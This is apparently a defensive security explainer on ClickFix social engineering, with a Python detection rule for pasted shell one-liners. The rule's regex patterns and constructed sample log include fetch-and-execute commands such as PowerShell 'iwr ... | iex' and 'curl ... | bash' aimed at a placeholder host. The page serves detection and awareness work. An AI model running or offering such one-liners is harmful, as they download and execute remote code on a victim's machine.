ClickFix
ClickFix is a social engineering technique that tricks users into executing malicious commands or actions by pretending to offer a fix for a technical problem.
What is ClickFix?
ClickFix is a social engineering attack technique in which attackers persuade users to manually execute malicious actions - such as copying and pasting commands, running scripts, or installing tools - under the guise of fixing an error or security issue.
Unlike traditional malware delivery, ClickFix often bypasses automatic security controls by relying on user interaction.
Why ClickFix matters
ClickFix is dangerous because it:
- Exploits user trust and urgency
- Bypasses email and endpoint protections
- Requires no exploit or vulnerability
- Works across operating systems
- Is difficult to block with traditional defenses
It has become increasingly common in targeted and opportunistic attacks.
How a ClickFix attack works
A typical ClickFix attack follows this pattern:
- The victim encounters a fake error or warning (website, email, pop-up)
- The message claims a fix is required (browser issue, security alert, update)
- Instructions tell the user to copy/paste or run a command
- The user executes the command manually
- Malware is installed or access is granted
The "fix" is actually the attack vector.
Common ClickFix scenarios
ClickFix is frequently used in:
- Fake browser error pages
- Malicious SEO or compromised websites
- Fake CAPTCHA or verification steps
- Email or chat-based "IT support" scams
- Cloud or Microsoft-style warning pages
Commands may target PowerShell, Bash, Terminal, or Run dialogs.
ClickFix vs traditional malware delivery
| Aspect | ClickFix | Traditional malware |
|---|---|---|
| Exploit required | No | Often |
| User interaction | Mandatory | Optional |
| AV detection | Lower | Higher |
| Technique | Social engineering | Technical exploitation |
| Visibility | High deception | Often hidden |
ClickFix relies on human execution, not software flaws.
Malware delivered via ClickFix
ClickFix campaigns commonly deploy:
- Info-stealers
- Remote access trojans (RATs)
- Loaders and droppers
- Ransomware precursors
- Persistence scripts
The initial payload is often small but enables follow-on attacks.
Why ClickFix is effective
ClickFix succeeds because:
- Users trust instructions that look technical
- The action feels "legitimate"
- The user believes they initiated the fix
- Security tools may not block manual actions
- Contextual pressure creates urgency
It exploits human behavior rather than system weaknesses.
Preventing ClickFix attacks
Effective defenses include:
- User awareness and training
- Blocking content that instructs users to paste and execute commands
- Restricting script execution where possible
- Application control and least privilege
- Browser isolation and URL filtering
- Monitoring suspicious command execution
Education is as important as technical controls.
Detection considerations
Security teams may detect ClickFix via:
- Unusual command-line activity
- User-initiated script execution
- PowerShell or shell abuse
- Endpoint behavior anomalies
- Correlation with phishing or malicious URLs
ClickFix often appears benign at first glance.
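The detection signals listed above can be combined into a simple rule: a shell interpreter launched from a user-driven parent (Run dialog, browser, terminal) with a command line that shows the traits of a pasted one-liner. The script below is an added example, not code from this page or any product; the log format (`parent=... image=... cmdline=...`) and the sample lines are constructed for illustration and use `example.invalid` rather than any real host.

```python
import re

# Interpreters that a pasted "fix" typically executes in (assumed set).
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "bash", "sh", "zsh"}
# Parents that indicate a human-driven launch rather than a service or task.
USER_LAUNCHERS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "gnome-terminal"}
# Traits common to pasted one-liners: hidden window, encoded payload,
# fetch-then-execute chains, and mshta pulling remote content.
INDICATORS = {
    "hidden window": re.compile(r"-(?:w|windowstyle)\s+hidden", re.I),
    "encoded command": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download-and-execute": re.compile(
        r"\b(?:iwr|invoke-webrequest|curl|wget)\b.*\|\s*(?:iex|invoke-expression|sh|bash)\b", re.I),
    "mshta remote content": re.compile(r"\bmshta\b.*https?://", re.I),
}
# Constructed log line format; real EDR/Sysmon fields will differ.
LINE_RE = re.compile(r"parent=(\S+)\s+image=(\S+)\s+cmdline=(.*)$")

def analyse_line(line):
    """Return (parent, reasons) when a line matches the ClickFix pattern, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    parent, image, cmdline = m.groups()
    if re.split(r"[\\/]", image)[-1].lower() not in SHELLS:
        return None  # not a shell interpreter at all
    reasons = [label for label, pat in INDICATORS.items() if pat.search(cmdline)]
    if not reasons:
        return None  # ordinary shell use such as 'cmd /c dir' is not flagged
    if parent.lower() in USER_LAUNCHERS:
        reasons.append(f"user-driven parent {parent}")
    return parent, reasons

def detect(log_text):
    """Scan a multi-line log and return {line_number: reasons} for flagged lines."""
    alerts = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        result = analyse_line(line)
        if result:
            alerts[n] = result[1]
    return alerts

# Constructed sample events: lines 1, 3 and 5 show the pattern; 2 and 4 are benign.
SAMPLE_LOG = """\
parent=explorer.exe image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline=powershell -w hidden -c "iwr https://example.invalid/x | iex"
parent=services.exe image=C:\\Windows\\System32\\svchost.exe cmdline=svchost.exe -k netsvcs
parent=chrome.exe image=C:\\Windows\\System32\\mshta.exe cmdline=mshta https://example.invalid/verify
parent=explorer.exe image=C:\\Windows\\System32\\cmd.exe cmdline=cmd /c dir
parent=gnome-terminal image=/bin/bash cmdline=bash -c "curl -s https://example.invalid/fix.sh | bash"
"""

if __name__ == "__main__":
    for n, reasons in detect(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(reasons)}")
```

In production the parent/child relationship and the indicator list would come from the EDR's own process-creation events; the value of the rule is in correlating the user-driven parent with the one-liner traits, since either alone is noisy.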
Common misconceptions
- "If the user runs it, it's not malware"
- "Antivirus will always stop this"
- "Only non-technical users fall for ClickFix"
- "ClickFix is just phishing"